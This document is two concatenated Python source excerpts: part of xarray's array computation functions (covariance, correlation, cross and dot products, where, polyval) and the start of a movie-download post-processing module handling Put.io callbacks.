elif any(isinstance(a, DataArray) for a in args):
return apply_dataarray_vfunc(
variables_vfunc,
*args,
signature=signature,
join=join,
exclude_dims=exclude_dims,
keep_attrs=keep_attrs,
)
# feed Variables directly through apply_variable_ufunc
elif any(isinstance(a, Variable) for a in args):
return variables_vfunc(*args)
else:
# feed anything else through apply_array_ufunc
return apply_array_ufunc(func, *args, dask=dask)
def cov(da_a, da_b, dim=None, ddof=1):
"""
Compute covariance between two DataArray objects along a shared dimension.
Parameters
----------
da_a : DataArray
Array to compute.
da_b : DataArray
Array to compute.
dim : str, optional
The dimension along which the covariance will be computed
ddof : int, optional
If ddof=1, covariance is normalized by N-1, giving an unbiased estimate,
else normalization is by N.
Returns
-------
covariance : DataArray
See Also
--------
pandas.Series.cov : corresponding pandas function
xarray.corr : respective function to calculate correlation
Examples
--------
>>> from xarray import DataArray
>>> da_a = DataArray(
... np.array([[1, 2, 3], [0.1, 0.2, 0.3], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_a
<xarray.DataArray (space: 3, time: 3)>
array([[1. , 2. , 3. ],
[0.1, 0.2, 0.3],
[3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> da_b = DataArray(
... np.array([[0.2, 0.4, 0.6], [15, 10, 5], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_b
<xarray.DataArray (space: 3, time: 3)>
array([[ 0.2, 0.4, 0.6],
[15. , 10. , 5. ],
[ 3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> xr.cov(da_a, da_b)
<xarray.DataArray ()>
array(-3.53055556)
>>> xr.cov(da_a, da_b, dim="time")
<xarray.DataArray (space: 3)>
array([ 0.2 , -0.5 , 1.69333333])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
"""
from .dataarray import DataArray
if any(not isinstance(arr, DataArray) for arr in [da_a, da_b]):
raise TypeError(
"Only xr.DataArray is supported."
"Given {}.".format([type(arr) for arr in [da_a, da_b]])
)
return _cov_corr(da_a, da_b, dim=dim, ddof=ddof, method="cov")
def corr(da_a, da_b, dim=None):
"""
Compute the Pearson correlation coefficient between
two DataArray objects along a shared dimension.
Parameters
----------
da_a : DataArray
Array to compute.
da_b : DataArray
Array to compute.
dim : str, optional
The dimension along which the correlation will be computed
Returns
-------
correlation: DataArray
See Also
--------
pandas.Series.corr : corresponding pandas function
xarray.cov : underlying covariance function
Examples
--------
>>> from xarray import DataArray
>>> da_a = DataArray(
... np.array([[1, 2, 3], [0.1, 0.2, 0.3], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_a
<xarray.DataArray (space: 3, time: 3)>
array([[1. , 2. , 3. ],
[0.1, 0.2, 0.3],
[3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> da_b = DataArray(
... np.array([[0.2, 0.4, 0.6], [15, 10, 5], [3.2, 0.6, 1.8]]),
... dims=("space", "time"),
... coords=[
... ("space", ["IA", "IL", "IN"]),
... ("time", pd.date_range("2000-01-01", freq="1D", periods=3)),
... ],
... )
>>> da_b
<xarray.DataArray (space: 3, time: 3)>
array([[ 0.2, 0.4, 0.6],
[15. , 10. , 5. ],
[ 3.2, 0.6, 1.8]])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03
>>> xr.corr(da_a, da_b)
<xarray.DataArray ()>
array(-0.57087777)
>>> xr.corr(da_a, da_b, dim="time")
<xarray.DataArray (space: 3)>
array([ 1., -1., 1.])
Coordinates:
* space (space) <U2 'IA' 'IL' 'IN'
"""
from .dataarray import DataArray
if any(not isinstance(arr, DataArray) for arr in [da_a, da_b]):
raise TypeError(
"Only xr.DataArray is supported."
"Given {}.".format([type(arr) for arr in [da_a, da_b]])
)
return _cov_corr(da_a, da_b, dim=dim, method="corr")
def _cov_corr(da_a, da_b, dim=None, ddof=0, method=None):
"""
Internal method for xr.cov() and xr.corr() so only have to
sanitize the input arrays once and we don't repeat code.
"""
# 1. Broadcast the two arrays
da_a, da_b = align(da_a, da_b, join="inner", copy=False)
# 2. Ignore the nans
valid_values = da_a.notnull() & da_b.notnull()
da_a = da_a.where(valid_values)
da_b = da_b.where(valid_values)
valid_count = valid_values.sum(dim) - ddof
# 3. Detrend along the given dim
demeaned_da_a = da_a - da_a.mean(dim=dim)
demeaned_da_b = da_b - da_b.mean(dim=dim)
# 4. Compute covariance along the given dim
# N.B. `skipna=False` is required or there is a bug when computing
# auto-covariance. E.g. Try xr.cov(da,da) for
# da = xr.DataArray([[1, 2], [1, np.nan]], dims=["x", "time"])
cov = (demeaned_da_a * demeaned_da_b).sum(dim=dim, skipna=True, min_count=1) / (
valid_count
)
if method == "cov":
return cov
else:
# compute std + corr
da_a_std = da_a.std(dim=dim)
da_b_std = da_b.std(dim=dim)
corr = cov / (da_a_std * da_b_std)
return corr
def cross(
a: DataArray | Variable, b: DataArray | Variable, *, dim: Hashable
) -> DataArray | Variable:
"""
Compute the cross product of two (arrays of) vectors.
The cross product of `a` and `b` in :math:`R^3` is a vector
perpendicular to both `a` and `b`. The vectors in `a` and `b` are
defined by the values along the dimension `dim` and can have sizes
1, 2 or 3. Where the size of either `a` or `b` is
1 or 2, the remaining components of the input vector is assumed to
be zero and the cross product calculated accordingly. In cases where
both input vectors have dimension 2, the z-component of the cross
product is returned.
Parameters
----------
a, b : DataArray or Variable
Components of the first and second vector(s).
dim : hashable
The dimension along which the cross product will be computed.
Must be available in both vectors.
Examples
--------
Vector cross-product with 3 dimensions:
>>> a = xr.DataArray([1, 2, 3])
>>> b = xr.DataArray([4, 5, 6])
>>> xr.cross(a, b, dim="dim_0")
<xarray.DataArray (dim_0: 3)>
array([-3, 6, -3])
Dimensions without coordinates: dim_0
Vector cross-product with 2 dimensions, returns in the perpendicular
direction:
>>> a = xr.DataArray([1, 2])
>>> b = xr.DataArray([4, 5])
>>> xr.cross(a, b, dim="dim_0")
<xarray.DataArray ()>
array(-3)
Vector cross-product with 3 dimensions but zeros at the last axis
yields the same results as with 2 dimensions:
>>> a = xr.DataArray([1, 2, 0])
>>> b = xr.DataArray([4, 5, 0])
>>> xr.cross(a, b, dim="dim_0")
<xarray.DataArray (dim_0: 3)>
array([ 0, 0, -3])
Dimensions without coordinates: dim_0
One vector with dimension 2:
>>> a = xr.DataArray(
... [1, 2],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "y"])),
... )
>>> b = xr.DataArray(
... [4, 5, 6],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "y", "z"])),
... )
>>> xr.cross(a, b, dim="cartesian")
<xarray.DataArray (cartesian: 3)>
array([12, -6, -3])
Coordinates:
* cartesian (cartesian) <U1 'x' 'y' 'z'
One vector with dimension 2 but coords in other positions:
>>> a = xr.DataArray(
... [1, 2],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "z"])),
... )
>>> b = xr.DataArray(
... [4, 5, 6],
... dims=["cartesian"],
... coords=dict(cartesian=(["cartesian"], ["x", "y", "z"])),
... )
>>> xr.cross(a, b, dim="cartesian")
<xarray.DataArray (cartesian: 3)>
array([-10, 2, 5])
Coordinates:
* cartesian (cartesian) <U1 'x' 'y' 'z'
Multiple vector cross-products. Note that the direction of the
cross product vector is defined by the right-hand rule:
>>> a = xr.DataArray(
... [[1, 2, 3], [4, 5, 6]],
... dims=("time", "cartesian"),
... coords=dict(
... time=(["time"], [0, 1]),
... cartesian=(["cartesian"], ["x", "y", "z"]),
... ),
... )
>>> b = xr.DataArray(
... [[4, 5, 6], [1, 2, 3]],
... dims=("time", "cartesian"),
... coords=dict(
... time=(["time"], [0, 1]),
... cartesian=(["cartesian"], ["x", "y", "z"]),
... ),
... )
>>> xr.cross(a, b, dim="cartesian")
<xarray.DataArray (time: 2, cartesian: 3)>
array([[-3, 6, -3],
[ 3, -6, 3]])
Coordinates:
* time (time) int64 0 1
* cartesian (cartesian) <U1 'x' 'y' 'z'
Cross can be called on Datasets by converting to DataArrays and later
back to a Dataset:
>>> ds_a = xr.Dataset(dict(x=("dim_0", [1]), y=("dim_0", [2]), z=("dim_0", [3])))
>>> ds_b = xr.Dataset(dict(x=("dim_0", [4]), y=("dim_0", [5]), z=("dim_0", [6])))
>>> c = xr.cross(
... ds_a.to_array("cartesian"), ds_b.to_array("cartesian"), dim="cartesian"
... )
>>> c.to_dataset(dim="cartesian")
<xarray.Dataset>
Dimensions: (dim_0: 1)
Dimensions without coordinates: dim_0
Data variables:
x (dim_0) int64 -3
y (dim_0) int64 6
z (dim_0) int64 -3
See Also
--------
numpy.cross : Corresponding numpy function
"""
if dim not in a.dims:
raise ValueError(f"Dimension {dim!r} not on a")
elif dim not in b.dims:
raise ValueError(f"Dimension {dim!r} not on b")
if not 1 <= a.sizes[dim] <= 3:
raise ValueError(
f"The size of {dim!r} on a must be 1, 2, or 3 to be "
f"compatible with a cross product but is {a.sizes[dim]}"
)
elif not 1 <= b.sizes[dim] <= 3:
raise ValueError(
f"The size of {dim!r} on b must be 1, 2, or 3 to be "
f"compatible with a cross product but is {b.sizes[dim]}"
)
all_dims = list(dict.fromkeys(a.dims + b.dims))
if a.sizes[dim] != b.sizes[dim]:
# Arrays have different sizes. Append zeros where the smaller
# array is missing a value, zeros will not affect np.cross:
if (
not isinstance(a, Variable) # Only used to make mypy happy.
and dim in getattr(a, "coords", {})
and not isinstance(b, Variable) # Only used to make mypy happy.
and dim in getattr(b, "coords", {})
):
# If the arrays have coords we know which indexes to fill
# with zeros:
a, b = align(
a,
b,
fill_value=0,
join="outer",
exclude=set(all_dims) - {dim},
)
elif min(a.sizes[dim], b.sizes[dim]) == 2:
# If the array doesn't have coords we can only infer
# that it has composite values if the size is at least 2.
# Once padded, rechunk the padded array because apply_ufunc
# requires core dimensions not to be chunked:
if a.sizes[dim] < b.sizes[dim]:
a = a.pad({dim: (0, 1)}, constant_values=0)
# TODO: Should pad or apply_ufunc handle correct chunking?
a = a.chunk({dim: -1}) if is_duck_dask_array(a.data) else a
else:
b = b.pad({dim: (0, 1)}, constant_values=0)
# TODO: Should pad or apply_ufunc handle correct chunking?
b = b.chunk({dim: -1}) if is_duck_dask_array(b.data) else b
else:
raise ValueError(
f"{dim!r} on {'a' if a.sizes[dim] == 1 else 'b'} is incompatible:"
" dimensions without coordinates must have have a length of 2 or 3"
)
c = apply_ufunc(
np.cross,
a,
b,
input_core_dims=[[dim], [dim]],
output_core_dims=[[dim] if a.sizes[dim] == 3 else []],
dask="parallelized",
output_dtypes=[np.result_type(a, b)],
)
c = c.transpose(*all_dims, missing_dims="ignore")
return c
def dot(*arrays, dims=None, **kwargs):
"""Generalized dot product for xarray objects. Like np.einsum, but
provides a simpler interface based on array dimensions.
Parameters
----------
*arrays : DataArray or Variable
Arrays to compute.
dims : ..., str or tuple of str, optional
Which dimensions to sum over. Ellipsis ('...') sums over all dimensions.
If not specified, then all the common dimensions are summed over.
**kwargs : dict
Additional keyword arguments passed to numpy.einsum or
dask.array.einsum
Returns
-------
DataArray
Examples
--------
>>> da_a = xr.DataArray(np.arange(3 * 2).reshape(3, 2), dims=["a", "b"])
>>> da_b = xr.DataArray(np.arange(3 * 2 * 2).reshape(3, 2, 2), dims=["a", "b", "c"])
>>> da_c = xr.DataArray(np.arange(2 * 3).reshape(2, 3), dims=["c", "d"])
>>> da_a
<xarray.DataArray (a: 3, b: 2)>
array([[0, 1],
[2, 3],
[4, 5]])
Dimensions without coordinates: a, b
>>> da_b
<xarray.DataArray (a: 3, b: 2, c: 2)>
array([[[ 0, 1],
[ 2, 3]],
<BLANKLINE>
[[ 4, 5],
[ 6, 7]],
<BLANKLINE>
[[ 8, 9],
[10, 11]]])
Dimensions without coordinates: a, b, c
>>> da_c
<xarray.DataArray (c: 2, d: 3)>
array([[0, 1, 2],
[3, 4, 5]])
Dimensions without coordinates: c, d
>>> xr.dot(da_a, da_b, dims=["a", "b"])
<xarray.DataArray (c: 2)>
array([110, 125])
Dimensions without coordinates: c
>>> xr.dot(da_a, da_b, dims=["a"])
<xarray.DataArray (b: 2, c: 2)>
array([[40, 46],
[70, 79]])
Dimensions without coordinates: b, c
>>> xr.dot(da_a, da_b, da_c, dims=["b", "c"])
<xarray.DataArray (a: 3, d: 3)>
array([[ 9, 14, 19],
[ 93, 150, 207],
[273, 446, 619]])
Dimensions without coordinates: a, d
>>> xr.dot(da_a, da_b)
<xarray.DataArray (c: 2)>
array([110, 125])
Dimensions without coordinates: c
>>> xr.dot(da_a, da_b, dims=...)
<xarray.DataArray ()>
array(235)
"""
from .dataarray import DataArray
from .variable import Variable
if any(not isinstance(arr, (Variable, DataArray)) for arr in arrays):
raise TypeError(
"Only xr.DataArray and xr.Variable are supported."
"Given {}.".format([type(arr) for arr in arrays])
)
if len(arrays) == 0:
raise TypeError("At least one array should be given.")
if isinstance(dims, str):
dims = (dims,)
common_dims = set.intersection(*[set(arr.dims) for arr in arrays])
all_dims = []
for arr in arrays:
all_dims += [d for d in arr.dims if d not in all_dims]
einsum_axes = "abcdefghijklmnopqrstuvwxyz"
dim_map = {d: einsum_axes[i] for i, d in enumerate(all_dims)}
if dims is ...:
dims = all_dims
elif dims is None:
# find dimensions that occur more than one times
dim_counts = Counter()
for arr in arrays:
dim_counts.update(arr.dims)
dims = tuple(d for d, c in dim_counts.items() if c > 1)
dims = tuple(dims) # make dims a tuple
# dimensions to be parallelized
broadcast_dims = tuple(d for d in all_dims if d in common_dims and d not in dims)
input_core_dims = [
[d for d in arr.dims if d not in broadcast_dims] for arr in arrays
]
output_core_dims = [tuple(d for d in all_dims if d not in dims + broadcast_dims)]
# construct einsum subscripts, such as '...abc,...ab->...c'
# Note: input_core_dims are always moved to the last position
subscripts_list = [
"..." + "".join(dim_map[d] for d in ds) for ds in input_core_dims
]
subscripts = ",".join(subscripts_list)
subscripts += "->..." + "".join(dim_map[d] for d in output_core_dims[0])
join = OPTIONS["arithmetic_join"]
# using "inner" emulates `(a * b).sum()` for all joins (except "exact")
if join != "exact":
join = "inner"
# subscripts should be passed to np.einsum as arg, not as kwargs. We need
# to construct a partial function for apply_ufunc to work.
func = functools.partial(duck_array_ops.einsum, subscripts, **kwargs)
result = apply_ufunc(
func,
*arrays,
input_core_dims=input_core_dims,
output_core_dims=output_core_dims,
join=join,
dask="allowed",
)
return result.transpose(*all_dims, missing_dims="ignore")
def where(cond, x, y, keep_attrs=None):
"""Return elements from `x` or `y` depending on `cond`.
Performs xarray-like broadcasting across input arguments.
All dimension coordinates on `x` and `y` must be aligned with each
other and with `cond`.
Parameters
----------
cond : scalar, array, Variable, DataArray or Dataset
When True, return values from `x`, otherwise returns values from `y`.
x : scalar, array, Variable, DataArray or Dataset
values to choose from where `cond` is True
y : scalar, array, Variable, DataArray or Dataset
values to choose from where `cond` is False
keep_attrs : bool or str or callable, optional
How to treat attrs. If True, keep the attrs of `x`.
Returns
-------
Dataset, DataArray, Variable or array
In priority order: Dataset, DataArray, Variable or array, whichever
type appears as an input argument.
Examples
--------
>>> x = xr.DataArray(
... 0.1 * np.arange(10),
... dims=["lat"],
... coords={"lat": np.arange(10)},
... name="sst",
... )
>>> x
<xarray.DataArray 'sst' (lat: 10)>
array([0. , 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])
Coordinates:
* lat (lat) int64 0 1 2 3 4 5 6 7 8 9
>>> xr.where(x < 0.5, x, x * 100)
<xarray.DataArray 'sst' (lat: 10)>
array([ 0. , 0.1, 0.2, 0.3, 0.4, 50. , 60. , 70. , 80. , 90. ])
Coordinates:
* lat (lat) int64 0 1 2 3 4 5 6 7 8 9
>>> y = xr.DataArray(
... 0.1 * np.arange(9).reshape(3, 3),
... dims=["lat", "lon"],
... coords={"lat": np.arange(3), "lon": 10 + np.arange(3)},
... name="sst",
... )
>>> y
<xarray.DataArray 'sst' (lat: 3, lon: 3)>
array([[0. , 0.1, 0.2],
[0.3, 0.4, 0.5],
[0.6, 0.7, 0.8]])
Coordinates:
* lat (lat) int64 0 1 2
* lon (lon) int64 10 11 12
>>> xr.where(y.lat < 1, y, -1)
<xarray.DataArray (lat: 3, lon: 3)>
array([[ 0. , 0.1, 0.2],
[-1. , -1. , -1. ],
[-1. , -1. , -1. ]])
Coordinates:
* lat (lat) int64 0 1 2
* lon (lon) int64 10 11 12
>>> cond = xr.DataArray([True, False], dims=["x"])
>>> x = xr.DataArray([1, 2], dims=["y"])
>>> xr.where(cond, x, 0)
<xarray.DataArray (x: 2, y: 2)>
array([[1, 2],
[0, 0]])
Dimensions without coordinates: x, y
See Also
--------
numpy.where : corresponding numpy function
Dataset.where, DataArray.where :
equivalent methods
"""
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
if keep_attrs is True:
# keep the attributes of x, the second parameter, by default to
# be consistent with the `where` method of `DataArray` and `Dataset`
keep_attrs = lambda attrs, context: getattr(x, "attrs", {})
# alignment for three arguments is complicated, so don't support it yet
return apply_ufunc(
duck_array_ops.where,
cond,
x,
y,
join="exact",
dataset_join="exact",
dask="allowed",
keep_attrs=keep_attrs,
)
@overload
def polyval(coord: DataArray, coeffs: DataArray, degree_dim: Hashable) -> DataArray:
...
@overload
def polyval(coord: T_Xarray, coeffs: Dataset, degree_dim: Hashable) -> Dataset:
...
@overload
def polyval(coord: Dataset, coeffs: T_Xarray, degree_dim: Hashable) -> Dataset:
...
def polyval(
coord: T_Xarray, coeffs: T_Xarray, degree_dim: Hashable = "degree"
) -> T_Xarray:
"""Evaluate a polynomial at specific values
Parameters
----------
coord : DataArray or Dataset
Values at which to evaluate the polynomial.
coeffs : DataArray or Dataset
Coefficients of the polynomial.
degree_dim : Hashable, default: "degree"
Name of the polynomial degree dimension in `coeffs`.
Returns
-------
DataArray or Dataset
Evaluated polynomial.
See Also
--------
xarray.DataArray.polyfit
numpy.polynomial.polynomial.polyval
"""
if degree_dim not in coeffs._indexes:
raise ValueError(
f"Dimension `{degree_dim}` should be a coordinate variable with labels."
)
if not np.issubdtype(coeffs[degree_dim].dtype, int):
raise ValueError(
f"Dimension `{degree_dim}` should be of integer dtype. Received {coeffs[degree_dim].dtype} instead."
)
max_deg = coeffs[degree_dim].max().item()
coeffs = coeffs.reindex(
{degree_dim: np.arange(max_deg + 1)}, fill_value=0, copy=False
)
coord = _ensure_numeric(coord)
# using Horner's method
# https://en.wikipedia.org/wiki/Horner%27s_method
res = coeffs.isel({degree_dim: max_deg}, drop=True) + zeros_like(coord)
for deg in range(max_deg - 1, -1, -1):
res *= coord
res += coeffs.isel({degree_dim: deg}, drop=True)
return res
def _ensure_numeric(data: T_Xarray) -> T_Xarray:
"""Converts all datetime64 variables to float64
Parameters
----------
data : DataArray or Dataset
Variables with possible datetime dtypes.
Returns
-------
DataArray or Dataset
Variables with datetime64 dtypes converted to float64.
"""
from .dataset import Dataset
def to_floatable(x: DataArray) -> DataArray:
if x.dtype.kind in "mM":
return x.copy(
data=datetime_to_numeric(
x.data,
offset=np.datetime64("1970-01-01"),
datetime_unit="ns",
),
)
return x
if isinstance(data, Dataset):
return data.map(to_floatable)
else:
return to_floatable(data)
def _calc_idxminmax(
*,
array,
func: Callable,
dim: Hashable = None,
skipna: bool = None,
fill_value: Any = dtypes.NA,
keep_attrs: bool = None,
):
"""Apply common operations for idxmin and idxmax."""
# This function doesn't make sense for scalars so don't try
if not array.ndim:
raise ValueError("This function does not apply for scalars")
if dim is not None:
pass # Use the dim if available
elif array.ndim == 1:
# it is okay to guess the dim if there is only 1
dim = array.dims[0]
else:
# The dim is not specified and ambiguous. Don't guess.
raise ValueError("Must supply 'dim' argument for multidimensional arrays")
if dim not in array.dims:
raise KeyError(f'Dimension "{dim}" not in dimension')
if dim not in array.coords:
raise KeyError(f'Dimension "{dim}" does not have coordinates')
# These are dtypes with NaN values argmin and argmax can handle
na_dtypes = "cfO"
if skipna or (skipna is None and array.dtype.kind in na_dtypes):
# Need to skip NaN values since argmin and argmax can't handle them
allna = array.isnull().all(dim)
array = array.where(~allna, 0)
# This will run argmin or argmax.
indx = func(array, dim=dim, axis=None, keep_attrs=keep_attrs, skipna=skipna)
# Handle dask arrays.
if is_duck_dask_array(array.data):
import dask.array
chunks = dict(zip(array.dims, array.chunks))
dask_coord = dask.array.from_array(array[dim].data, chunks=chunks[dim])
res = indx.copy(data=dask_coord[indx.data.ravel()].reshape(indx.shape))
# we need to attach back the dim name
res.name = dim
else:
res = array[dim][(indx,)]
# The dim is gone but we need to remove the corresponding coordinate.
del res.coords[dim]
if skipna or (skipna is None and array.dtype.kind in na_dtypes):
# Put the NaN values back in after removing them
res = res.where(~allna, fill_value)
# Copy attributes from argmin/argmax, if any
res.attrs = indx.attrs
return res
def unify_chunks(*objects: T_Xarray) -> tuple[T_Xarray, ...]:
"""
Given any number of Dataset and/or DataArray objects, returns
new objects with unified chunk size along all chunked dimensions.
Returns
-------
unified (DataArray or Dataset) – Tuple of objects with the same type as
*objects with consistent chunk sizes for all dask-array variables
See Also
--------
dask.array.core.unify_chunks
"""
from .dataarray import DataArray
# Convert all objects to datasets
datasets = [
obj._to_temp_dataset() if isinstance(obj, DataArray) else obj.copy()
for obj in objects
]
# Get arguments to pass into dask.array.core.unify_chunks
unify_chunks_args = []
sizes: dict[Hashable, int] = {}
for ds in datasets:
for v in ds._variables.values():
if v.chunks is not None:
# Check that sizes match across different datasets
for dim, size in v.sizes.items():
try:
if sizes[dim] != size:
raise ValueError(
f"Dimension {dim!r} size mismatch: {sizes[dim]} != {size}"
)
except KeyError:
sizes[dim] = size
unify_chunks_args += [v._data, v._dims]
# No dask arrays: Return inputs
if not unify_chunks_args:
return objects
# Run dask.array.core.unify_chunks
from dask.array.core import unify_chunks
_, dask_data = unify_chunks(*unify_chunks_args)
dask_data_iter = iter(dask_data)
out = []
for obj, ds in zip(objects, datasets):
for k, v in ds._variables.items():
if v.chunks is not None:
ds._variables[k] = v.copy(data=next(dask_data_iter))
out.append(obj._from_temp_dataset(ds) if isinstance(obj, DataArray) else ds)
return tuple(out)
|
the-stack_0_1577 | import datetime
import json
import logging
import os
import re
import shutil
import cherrypy
import core
from core import plugins, snatcher
from core.library import Metadata, Manage
from core.downloaders import PutIO
logging = logging.getLogger(__name__)
class Postprocessing(object):
def __init__(self):
shutil.copystat = self.null
def null(*args, **kwargs):
return
@cherrypy.expose
def putio_process(self, *args, **transfer_data):
''' Method to handle postprocessing callbacks from Put.io
Gets called from Put.IO when download completes via POST request including download
metadata as transfer_data kwargs.
Sample kwargs:
{
"apikey": "APIKEY",
"percent_done": "100",
"peers_getting_from_us": "0",
"completion_percent": "0",
"seconds_seeding": "0",
"current_ratio": "0.00",
"created_torrent": "False",
"size": "507637",
"up_speed": "0",
"callback_url": "http://MYDDNS/watcher/postprocessing/putio_process?apikey=APIKEY",
"source": "<full magnet uri including trackers>",
"peers_connected": "0",
"down_speed": "0",
"is_private": "False",
"id": "45948956", # Download ID
"simulated": "True",
"type": "TORRENT",
"save_parent_id": "536510251",
"file_id": "536514172", # Put.io file ID #
"download_id": "21596709",
"torrent_link": "https://api.put.io/v2/transfers/<transferid>/torrent",
"finished_at": "2018-04-09 04:13:58",
"status": "COMPLETED",
"downloaded": "0",
"extract": "False",
"name": "<download name>",
"status_message": "Completed",
"created_at": "2018-04-09 04:13:57",
"uploaded": "0",
"peers_sending_to_us": "0"
}
'''
logging.info('########################################')
logging.info('PUT.IO Post-processing request received.')
logging.info('########################################')
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
data = {'downloadid': str(transfer_data['id'])}
if transfer_data['source'].startswith('magnet'):
data['guid'] = transfer_data['source'].split('btih:')[1].split('&')[0]
else:
data['guid'] = None
data.update(self.get_movie_info(data))
if conf['downloadwhencomplete']:
logging.info('Downloading Put.IO files and processing locally.')
download = PutIO.download(transfer_data['file_id'])
if not download['response']:
logging.error('PutIO processing failed.')
return
data['path'] = download['path']
data['original_file'] = self.get_movie_file(data['path'])
data.update(self.complete(data))
if data['status'] == 'finished' and conf['deleteafterdownload']:
data['tasks']['delete_putio'] = PutIO.delete(transfer_data['file_id'])
else:
logging.info('Marking guid as Finished.')
guid_result = {}
if data['guid']:
if Manage.searchresults(data['guid'], 'Finished'):
guid_result['update_SEARCHRESULTS'] = True
else:
guid_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid'], 'Finished', imdbid=data['imdbid']):
guid_result['update_MARKEDRESULTS'] = True
else:
guid_result['update_MARKEDRESULTS'] = False
# create result entry for guid
data['tasks'][data['guid']] = guid_result
# update MOVIES table
if data.get('imdbid'):
db_update = {'finished_file': 'https://app.put.io/files/{}'.format(transfer_data['file_id']), 'status': 'finished'}
core.sql.update_multiple_values('MOVIES', db_update, 'imdbid', data['imdbid'])
title = data['data'].get('title')
year = data['data'].get('year')
imdbid = data['data'].get('imdbid')
resolution = data['data'].get('resolution')
rated = data['data'].get('rated')
original_file = data['data'].get('original_file')
finished_file = data['data'].get('finished_file')
downloadid = data['data'].get('downloadid')
finished_date = data['data'].get('finished_date')
quality = data['data'].get('quality')
plugins.finished(title, year, imdbid, resolution, rated, original_file, finished_file, downloadid, finished_date, quality)
logging.info('#################################')
logging.info('Post-processing complete.')
logging.info(data)
logging.info('#################################')
@cherrypy.expose
@cherrypy.tools.json_out()
def default(self, **data):
''' Handles post-processing requests.
**data: keyword params send through POST request payload
Required kw params:
apikey (str): Watcher api key
mode (str): post-processing mode (complete, failed)
guid (str): download link of file. Can be url or magnet link.
path (str): absolute path to downloaded files. Can be single file or dir
Optional kw params:
imdbid (str): imdb identification number (tt123456)
downloadid (str): id number from downloader
While processing many variables are produced to track files through renaming, moving, etc
Perhaps the most important name is data['finished_file'], which is the current name/location
of the file being processed. This is updated when renamed, moved, etc.
Returns dict of post-processing tasks and data
'''
logging.info('#################################')
logging.info('Post-processing request received.')
logging.info('#################################')
# check for required keys
for key in ('apikey', 'mode', 'guid', 'path'):
if key not in data:
logging.warning('Missing key {}'.format(key))
return {'response': False, 'error': 'missing key: {}'.format(key)}
# check if api key is correct
if data['apikey'] != core.CONFIG['Server']['apikey']:
logging.warning('Incorrect API key.'.format(key))
return {'response': False, 'error': 'incorrect api key'}
# check if mode is valid
if data['mode'] not in ('failed', 'complete'):
logging.warning('Invalid mode value: {}.'.format(data['mode']))
return {'response': False, 'error': 'invalid mode value'}
logging.debug(data)
# modify path based on remote mapping
data['path'] = self.map_remote(data['path'])
# get the actual movie file name
data['original_file'] = self.get_movie_file(data['path'], check_size=False if data['mode'] == 'failed' else True)
data['parent_dir'] = os.path.basename(os.path.dirname(data['original_file'])) if data.get('original_file') else ''
if not data['original_file']:
logging.warning('Movie file not found')
data['mode'] = 'failed'
# Get possible local data or get TMDB data to merge with self.params.
logging.info('Gathering release information.')
data.update(self.get_movie_info(data))
# At this point we have all of the information we're going to get.
if data['mode'] == 'failed':
logging.warning('Post-processing as Failed.')
response = self.failed(data)
elif data['mode'] == 'complete':
logging.info('Post-processing as Complete.')
if 'task' not in data:
directory = core.CONFIG['Postprocessing']['Scanner']['directory']
if data['path'] == directory:
core.sql.save_postprocessed_path(data['original_file'])
else:
core.sql.save_postprocessed_path(data['path'])
response = self.complete(data)
response['data'].pop('backlog', '')
response['data'].pop('predb', '')
response['data'].pop('source', '')
title = response['data'].get('title')
year = response['data'].get('year')
imdbid = response['data'].get('imdbid')
resolution = response['data'].get('resolution')
rated = response['data'].get('rated')
original_file = response['data'].get('original_file')
finished_file = response['data'].get('finished_file')
downloadid = response['data'].get('downloadid')
finished_date = response['data'].get('finished_date')
quality = response['data'].get('quality')
plugins.finished(title, year, imdbid, resolution, rated, original_file, finished_file, downloadid, finished_date, quality)
else:
logging.warning('Invalid mode value: {}.'.format(data['mode']))
return {'response': False, 'error': 'invalid mode value'}
logging.info('#################################')
logging.info('Post-processing complete.')
logging.info(json.dumps(response, indent=2, sort_keys=True))
logging.info('#################################')
return response
def get_movie_file(self, path, check_size=True):
''' Looks for the filename of the movie being processed
path (str): url-passed path to download dir
If path is a file, just returns path.
If path is a directory, recursively finds the largest file in that dir.
Returns str absolute path of movie file
'''
logging.info('Finding movie file.')
if os.path.isfile(path):
logging.info('Post-processing file {}.'.format(path))
return path
else:
# Find the biggest file in the dir. Assume that this is the movie.
biggestfile = None
try:
s = 0
for root, dirs, filenames in os.walk(path):
for file in filenames:
f = os.path.join(root, file)
logging.debug('Found file {} in postprocessing dir.'.format(f))
size = os.path.getsize(f)
if size > s:
biggestfile = f
s = size
except Exception as e: # noqa
logging.warning('Unable to find file to process.', exc_info=True)
return None
if biggestfile:
minsize = core.CONFIG['Postprocessing']['Scanner']['minsize'] * 1048576
if check_size and os.path.getsize(os.path.join(path, biggestfile)) < minsize:
logging.info('Largest file in directory {} is {}, but is smaller than the minimum size of {} bytes'.format(path, biggestfile, minsize))
return None
logging.info('Largest file in directory {} is {}, processing this file.'.format(path, biggestfile.replace(path, '')))
else:
logging.warning('Unable to determine largest file. Postprocessing may fail at a later point.')
return biggestfile
